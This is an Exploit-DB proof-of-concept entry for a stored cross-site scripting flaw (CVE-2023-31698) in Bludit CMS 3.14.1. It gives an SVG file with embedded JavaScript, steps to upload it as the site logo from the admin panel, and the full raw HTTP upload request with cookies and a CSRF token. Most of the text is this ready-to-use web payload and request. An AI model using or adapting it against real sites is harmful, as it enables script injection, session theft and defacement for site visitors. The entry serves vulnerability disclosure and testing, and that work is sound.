Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)

EDB-ID:

51476




Platform:

PHP

Date:

2023-05-23


# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-04-15
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.bludit.com/
# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
# Version: 3.14.1
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31698

SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

save this SVG file xss.svg

Steps to Reproduce:

1. At first login your admin panel.
2. then go to settings and click the logo section.
3. Now upload xss.svg file so your request data will be

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data;
boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin;
BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;
BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651

-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"

626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

-----------------------------15560729415644048492005010998--

4. Now open the logo image link that you upload. You will see XSS pop up.